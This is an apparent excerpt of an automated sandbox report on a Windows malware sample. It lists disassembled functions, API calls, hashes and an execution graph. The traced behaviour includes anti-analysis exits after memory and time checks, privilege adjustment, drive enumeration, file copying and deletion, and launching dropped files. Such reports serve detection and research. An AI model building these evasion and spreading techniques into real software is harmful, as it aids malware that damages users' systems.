                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00410677
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpy
                                          • String ID: :$C$\
                                          • API String ID: 3688308991-3809124531
                                          • Opcode ID: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction ID: 0fd743142e69857df810ca52e688dcb88c4bbbf11868c05daf949f8eeda1cfcd
                                          • Opcode Fuzzy Hash: 25a8abe21516baa7b4b1769693489f63192825a774837cf75169adae2f8d7240
                                          • Instruction Fuzzy Hash: 6431A6B1D00248AFDF10DBA4DC45BEE77B4AF48304F144099F6496B281DB78AAD4CF99
                                          Function 00891427 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00891445
                                          • __aulldiv.LIBCMT ref: 0089145F
                                          • __aulldiv.LIBCMT ref: 0089146D
                                          • ExitProcess.KERNEL32 ref: 0089149B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction ID: dd0d69526b5d19ea35da374972e1e53dbf7bffda5d569665b55f775bb53431a0
                                          • Opcode Fuzzy Hash: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction Fuzzy Hash: 49014BB0D44308BAEF10EBA0CC4AB9DBAB9FB15B05F288048F605B66C0CA749941C759
                                          Function 004011C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011DE
                                          • __aulldiv.LIBCMT ref: 004011F8
                                          • __aulldiv.LIBCMT ref: 00401206
                                          • ExitProcess.KERNEL32 ref: 00401234
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction ID: 63c74367094331cdf1fb6dbb9c514130bce0dad876db1382a3ea100d6d0a74fc
                                          • Opcode Fuzzy Hash: 04869496aca4f93d1cafbfe058778225153f63141588f08022f0314a26537178
                                          • Instruction Fuzzy Hash: BE01FFB0940208BADB10DBD0DC49B9EB678AB54705F24805EE605F71D1D6785545875D
                                          Function 0089DFB7 Relevance: 7.6, APIs: 6, Instructions: 133COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d4510935dae32e01c87bc0af17c3f7dd213755d20e0946cad16a3e658b4fae8c
                                          • Instruction ID: a25a0fdc19f9a63dd88459be6347ff72cc56fb63fe953cd54277964604b5bdb0
                                          • Opcode Fuzzy Hash: d4510935dae32e01c87bc0af17c3f7dd213755d20e0946cad16a3e658b4fae8c
                                          • Instruction Fuzzy Hash: BA5171B2900218AFCF24EBA4DC89EEE7379FB55700F088589B249D2080DB759B84CF91
                                          Function 008A05C7 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemTime.KERNEL32(?), ref: 008A0613
                                          • sscanf.NTDLL ref: 008A0640
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A0659
                                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A0667
                                          • ExitProcess.KERNEL32 ref: 008A0681
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Time$System$File$ExitProcesssscanf
                                          • String ID:
                                          • API String ID: 2533653975-0
                                          • Opcode ID: 462dc0eb1d88cde8c89c69557fbe249f80c6d6f5e505daf12c6dfc978de6a258
                                          • Instruction ID: 4f607afe54c60c026e7cbbc4141c929d074ea4d17515cbc6d6c5c637a8e52c8a
                                          • Opcode Fuzzy Hash: 462dc0eb1d88cde8c89c69557fbe249f80c6d6f5e505daf12c6dfc978de6a258
                                          • Instruction Fuzzy Hash: 2D21CBB1D14209AFDF04EFE8D845AEEB7B6FF48300F14952AE505E3250EB345608CB65
                                          Function 00405800 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00405C7A), ref: 00405869
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: z\@$z\@
                                          • API String ID: 1029625771-3761194745
                                          • Opcode ID: ac16fded49e8aa3cf758ec64221ea8c8376f71899510e2d01cd7ec4d2b406570
                                          • Instruction ID: 80f3d9ff0f38952ba028e7ba221b2ae57abe6f94e1e5ed22da0b4b24787abaa8
                                          • Opcode Fuzzy Hash: ac16fded49e8aa3cf758ec64221ea8c8376f71899510e2d01cd7ec4d2b406570
                                          • Instruction Fuzzy Hash: B071C974A00609DFDB04DF44C584BAAB7B2FF88354F248269E8096B391D735AA81CF95
                                          Function 0040BCB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcessstrtok_s
                                          • String ID: block
                                          • API String ID: 3407564107-2199623458
                                          • Opcode ID: 2506647f052ed3a4df0d6a83b175f1bdcd1895952038a32fe540106415373500
                                          • Instruction ID: 1016d52d12fe1e50a1f30153379403fab5e6bc016d8da4aea0e238377b65fe71
                                          • Opcode Fuzzy Hash: 2506647f052ed3a4df0d6a83b175f1bdcd1895952038a32fe540106415373500
                                          • Instruction Fuzzy Hash: 70515E75A40209EFCB00DFA1D988BEE77B5EF54709F20806AE905B72C1D7789A41CB9D
                                          Function 0040EC70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400,?,?,0040EDEC,?,00000400), ref: 0040EC7D
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040EC84
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID: @$@
                                          • API String ID: 1357844191-2930932199
                                          • Opcode ID: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction ID: 0ad45b8a8120eac36b962287976033906f8581aa65983cfc467600e46e4bb566
                                          • Opcode Fuzzy Hash: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction Fuzzy Hash: 3B014075A40208BFEB10DBA8CC45FEE7779EB44704F208156FB05BB2C0DAB1AA009B59
                                          Function 0089E9C7 Relevance: 6.4, APIs: 5, Instructions: 172COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 230ad20d9c83ca3b5eb331709680e1b624b2a9e64bc94dcdd16c4e7c20db88c2
                                          • Instruction ID: f5a1d19e87df58fe1b9490229d5de92fa471ca0443cbf811a3713ce9f342a5e3
                                          • Opcode Fuzzy Hash: 230ad20d9c83ca3b5eb331709680e1b624b2a9e64bc94dcdd16c4e7c20db88c2
                                          • Instruction Fuzzy Hash: D5613471900218AFCF14EBE4DC89EEA7779FB98701F088599B60993090EF749B84CF95
                                          Function 0089DA87 Relevance: 6.2, APIs: 4, Instructions: 237stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID:
                                          • API String ID: 4038537762-0
                                          • Opcode ID: 45708fa9c051ce47051c56d8040ab57a7d21419f2f94184faeaa64b5423afe5c
                                          • Instruction ID: 65f961292ec7e2ec99a0647b9b1c4bb8ffb3005fdda93f7a89be9d24e6ff651b
                                          • Opcode Fuzzy Hash: 45708fa9c051ce47051c56d8040ab57a7d21419f2f94184faeaa64b5423afe5c
                                          • Instruction Fuzzy Hash: BE914DB29003189FDF24EBA4DC89EEE7379FB94700F088589B519D3191DB749A84CFA5
                                          Function 00410EB0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: - $%s\%s$?
                                          • API String ID: 3722407311-3278919252
                                          • Opcode ID: 720d16db40e135c7f75593100d42ea90143e969699d313e809dc33ce6561c3aa
                                          • Instruction ID: 89dad39f6cc2188168badbc2d9d52fc6bc985f341d4410da9706d1249eaf062f
                                          • Opcode Fuzzy Hash: 720d16db40e135c7f75593100d42ea90143e969699d313e809dc33ce6561c3aa
                                          • Instruction Fuzzy Hash: FB71F976900118ABDB64DF50CD95FEAB7B9BF48304F0086DAA209A6190DF746FC9CF94
                                          Function 00406500 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 115COMMON
                                          Download Yara Rule
                                          APIs
                                          • memcmp.MSVCRT ref: 0040651B
                                          • memset.MSVCRT ref: 0040654E
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                            • Part of subcall function 004130D0: lstrlen.KERNEL32(00000000,?,?,0040F9D0,00414677,00414676,?,?,00410567,00000000,?,008859C8,?,00414834,?,00000000), ref: 004130DB
                                            • Part of subcall function 004130D0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413135
                                            • Part of subcall function 00413050: lstrcpy.KERNEL32(?,00000000), ref: 00413096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlenmemcmpmemset
                                          • String ID: @$v10
                                          • API String ID: 1724756220-24753345
                                          • Opcode ID: 83eeb4b2afe74f17c85e7e2497b1b45e9e85ec7fad344035b0f7ebb7c51853e2
                                          • Instruction ID: e76eb520232f09c5838e303a6ffe8b8de85312eac25019e952f6e82f664b20c3
                                          • Opcode Fuzzy Hash: 83eeb4b2afe74f17c85e7e2497b1b45e9e85ec7fad344035b0f7ebb7c51853e2
                                          • Instruction Fuzzy Hash: 84413F71900208EFDB04DFA9CD95FDE7BB5BF44304F108119F906AB294DB78AA55CB98
                                          Function 008A07AB Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A0782
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008A07A0
                                          • CloseHandle.KERNEL32(00000000), ref: 008A07B1
                                          • Sleep.KERNEL32(00001770), ref: 008A07BC
                                          • CloseHandle.KERNEL32(?,00000000,?,00618488,?,00414834,?,00000000,?,00414838,?,00000000,00414682), ref: 008A07D2
                                          • ExitProcess.KERNEL32 ref: 008A07DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction ID: 80a8b09a4d02ba7a657e847b6ce31a3110b92088265e77911c7856aa15caa423
                                          • Opcode Fuzzy Hash: e403f8ffbb91593beead32c91cec5554c3c6bf1e1477261f753fe489317f82a5
                                          • Instruction Fuzzy Hash: 25F05E30900219AFF700ABA4DC46FBE33B4FF05B05F285415B612E28C1DBB56600CE52
                                          Function 004115D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          • GetSystemTime.KERNEL32(?,00000000,00414191,?,?,?,?,?,?,?,?,?,00403A73,?,00000014), ref: 004115F6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: SystemTimelstrcpy
                                          • String ID: s:@$s:@
                                          • API String ID: 62757014-2540443843
                                          • Opcode ID: 044bcc5253d9ed8355e8cc8fc245de3cc8e6ad25679a3886579f132f54362194
                                          • Instruction ID: 4fed1264785079df95f75e73a263aab63966ce5e4119c4fc5e1ac5e9256f35cb
                                          • Opcode Fuzzy Hash: 044bcc5253d9ed8355e8cc8fc245de3cc8e6ad25679a3886579f132f54362194
                                          • Instruction Fuzzy Hash: A611D672D00008AFCB04EFA9C8929EEBBB5EF58304F04C05EE41267155EF346A85CBA9
                                          Function 0089EED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0089EEE4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 0089EEEB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID: /EA
                                          • API String ID: 1357844191-1082462857
                                          • Opcode ID: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction ID: 45901ec1f685e1bef81e82401a6cc483ea1d5f50eb68f03a08de2c1a9cbb906d
                                          • Opcode Fuzzy Hash: 8789f0c22dbd4747596554955394aa19ac2db0340ff02eeac11c5d8a598097f8
                                          • Instruction Fuzzy Hash: 9101ED75A40208BFDB10DBA4DC45FAD7B79EB44704F24815AF709AB2C4DAB1AA009B95
                                          Function 004112A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004112EC
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004112F3
                                            • Part of subcall function 00412FF0: lstrcpy.KERNEL32(00414682,00000000), ref: 00413038
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcesslstrcpy
                                          • String ID: %dx%d
                                          • API String ID: 3688308991-2206825331
                                          • Opcode ID: 9528033989b3831d53b234d39f9700782877631107d750be855e91c67b059de5
                                          • Instruction ID: 053404a165637cf86093b191cbbf08ad206c4db23522c9d29381cfac6920a88f
                                          • Opcode Fuzzy Hash: 9528033989b3831d53b234d39f9700782877631107d750be855e91c67b059de5
                                          • Instruction Fuzzy Hash: 7111EDB5A40209AFDB00DFE4DC49FAE7B79FB48701F14954AFA05A7290DA7099008B95
                                          Function 004117C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00411F8E,00000000), ref: 004117CB
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 004117D2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateProcess
                                          • String ID: %hs
                                          • API String ID: 1357844191-2783943728
                                          • Opcode ID: 4d3c50648f06924e1988e1d7b9757bed8c573b7677992a8183437c42b4709702
                                          • Instruction ID: a4397fe6ced821d0dbd060ebb6f9329bd339c59d16e34419fedbf7be6031988b
                                          • Opcode Fuzzy Hash: 4d3c50648f06924e1988e1d7b9757bed8c573b7677992a8183437c42b4709702
                                          • Instruction Fuzzy Hash: 17E08C74A40208BFCB00CBD4DD4AEAD7BACEB44301F144095F90987280DEB19E009BA5
                                          Function 0089EDD7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0089EE11
                                          • lstrcat.KERNEL32(?,00414818), ref: 0089EE2E
                                          • lstrcat.KERNEL32(?,0061852C), ref: 0089EE42
                                          • lstrcat.KERNEL32(?,0041481C), ref: 0089EE54
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_890000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID:
                                          • API String ID: 4038537762-0
                                          • Opcode ID: 17f3b2e12a8e052ac4a5b08d4ce3d33ccb97d8600d17890a450db1d34e2e4e70
                                          • Instruction ID: 1e457c323344c1b0d552e4767d8daf4b04f7f560a16d7ca582366b2ff8db6e56
                                          • Opcode Fuzzy Hash: 17f3b2e12a8e052ac4a5b08d4ce3d33ccb97d8600d17890a450db1d34e2e4e70
                                          • Instruction Fuzzy Hash: 55219576904208AFDB14FBB4DC86DE9377AEBA4700F048546B649D3581EE749AC48B92
                                          Function 0040EB70 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040EBAA
                                          • lstrcat.KERNEL32(?,00414818), ref: 0040EBC7
                                          • lstrcat.KERNEL32(?,00000000), ref: 0040EBDB
                                          • lstrcat.KERNEL32(?,0041481C), ref: 0040EBED
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1511164621.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1511164621.0000000000618000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1511164621.000000000062A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_7Y18r(193).jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat
                                          • String ID:
                                          • API String ID: 4038537762-0
                                          • Opcode ID: fa6d5197ec8c1ffe68bde41e0d487440f9f90d648d6eb64e1d3ea5ac28aea448
                                          • Instruction ID: 87290655d41cbd68318cc685ddaeb870d4aec506c0115cc15e8e73b125a14c28
                                          • Opcode Fuzzy Hash: fa6d5197ec8c1ffe68bde41e0d487440f9f90d648d6eb64e1d3ea5ac28aea448
                                          • Instruction Fuzzy Hash: 4C21D77AA00208AFC714FBB0DC82ED9737EDB58704F04854BF64953091DE789AC48B95

                                          Execution Graph

                                          Execution Coverage:31.1%
                                          Dynamic/Decrypted Code Coverage:10.5%
                                          Signature Coverage:18.9%
                                          Total number of Nodes:296
                                          Total number of Limit Nodes:11
                                          execution_graph 1019 7014e1 1020 701541 1019->1020 1021 7014fd GetModuleHandleA 1019->1021 1023 701573 1020->1023 1026 701549 1020->1026 1022 70151a VirtualQuery 1021->1022 1024 701512 1021->1024 1022->1024 1030 701638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1023->1030 1024->1020 1025 701566 1026->1025 1047 701af9 1026->1047 1028 701579 ExitProcess 1031 70167a 1030->1031 1032 70167f 1030->1032 1065 70139f GetVersionExA 1031->1065 1053 701718 GetSystemTimeAsFileTime 1032->1053 1035 7016ca 1036 7016d0 1035->1036 1037 7016d7 1035->1037 1086 701581 1036->1086 1040 7016dd lstrcpy 1037->1040 1041 70170f 1037->1041 1038 701686 1038->1035 1042 7016a0 CreateThread 1038->1042 1040->1028 1041->1028 1058 702c48 memset 1042->1058 1302 701099 1042->1302 1046 701718 3 API calls 1046->1035 1048 701b11 1047->1048 1049 701b09 1047->1049 1051 701b16 CreateThread 1048->1051 1052 701b0f 1048->1052 1050 701638 188 API calls 1049->1050 1050->1052 1051->1052 1320 701638 189 API calls 1051->1320 1052->1025 1052->1052 1054 701754 1053->1054 1055 701735 SHSetValueA 1053->1055 1056 70175a SHGetValueA 1054->1056 1057 701786 __aulldiv 1054->1057 1055->1057 1056->1057 1057->1038 1092 701973 PathFileExistsA 1058->1092 1060 702cb2 1061 7016ba WaitForSingleObject 1060->1061 1062 702cbb VirtualFree 1060->1062 1061->1046 1062->1061 1064 702c8f CreateThread WaitForMultipleObjects 1064->1060 1114 702b8c memset GetLogicalDriveStringsA 1064->1114 1066 7014da 1065->1066 1067 7013cf LookupPrivilegeValueA 1065->1067 1066->1032 1068 7013ef 1067->1068 1069 7013e7 1067->1069 1068->1066 1287 70120e GetModuleHandleA GetProcAddress 1068->1287 1282 70119f GetCurrentProcess OpenProcessToken 1069->1282 1075 701448 GetCurrentProcessId 1075->1066 1076 701457 1075->1076 1076->1066 1077 701319 3 API calls 1076->1077 1078 70147f 1077->1078 1079 701319 3 API calls 1078->1079 1080 70148e 1079->1080 1080->1066 1081 701319 3 API calls 1080->1081 1082 7014b4 1081->1082 1083 701319 3 API calls 1082->1083 1084 7014c3 1083->1084 1085 701319 3 API calls 1084->1085 1085->1066 1301 70185b GetSystemTimeAsFileTime srand rand srand rand 1086->1301 1088 701592 wsprintfA wsprintfA lstrlen CreateFileA 1089 701633 1088->1089 1090 7015fb WriteFile CloseHandle 1088->1090 1089->1041 1090->1089 1091 70161d ShellExecuteA 1090->1091 1091->1089 1093 7019a0 1092->1093 1094 701ac7 1092->1094 1095 7019af CreateFileA 1093->1095 1094->1060 1094->1064 1096 7019c4 Sleep 1095->1096 1097 701a28 GetFileSize 1095->1097 1096->1095 1098 7019d5 1096->1098 1099 701a38 1097->1099 1110 701a80 1097->1110 1113 70185b GetSystemTimeAsFileTime srand rand srand rand 1098->1113 1101 701a3d VirtualAlloc 1099->1101 1099->1110 1105 701a53 1101->1105 1101->1110 1102 701a96 1106 701a9c DeleteFileA 1102->1106 1107 701aad 1102->1107 1103 701a8d FindCloseChangeNotification 1103->1102 1104 7019da wsprintfA CopyFileA 1104->1097 1109 701a0d CreateFileA 1104->1109 1105->1110 1111 701a59 ReadFile 1105->1111 1106->1107 1107->1094 1112 701ab8 VirtualFree 1107->1112 1109->1097 1109->1106 1110->1102 1110->1103 1111->1105 1111->1110 1112->1094 1113->1104 1115 702c09 WaitForMultipleObjects 1114->1115 1119 702bc8 1114->1119 1116 702c2a CreateThread 1115->1116 1117 702c3c 1115->1117 1116->1117 1125 702845 1116->1125 1118 702bfa lstrlen 1118->1115 1118->1119 1119->1118 1120 702bd2 GetDriveTypeA 1119->1120 1121 702be3 CreateThread 1119->1121 1120->1118 1120->1119 1121->1118 1122 702b7d 1121->1122 1135 7029e2 memset wsprintfA 1122->1135 1272 70274a memset memset SHGetSpecialFolderPathA wsprintfA 1125->1272 1127 702878 DeleteFileA 1128 70289a 1127->1128 1129 70288c VirtualFree 1127->1129 1131 7028a4 CloseHandle 1128->1131 1132 7028ab 1128->1132 1129->1128 1130 702692 8 API calls 1133 702853 1130->1133 1131->1132 1133->1127 1133->1130 1134 70239d 186 API calls 1133->1134 1134->1133 1136 702a3a memset lstrlen lstrcpyn strrchr 1135->1136 1137 702abc memset memset FindFirstFileA 1135->1137 1136->1137 1139 702a88 1136->1139 1149 7028b8 memset wsprintfA 1137->1149 1139->1137 1141 702a9a lstrcmpiA 1139->1141 1143 702b74 1141->1143 1144 702aad lstrlen 1141->1144 1142 702b61 FindNextFileA 1145 702b23 1142->1145 1146 702b6d FindClose 1142->1146 1144->1137 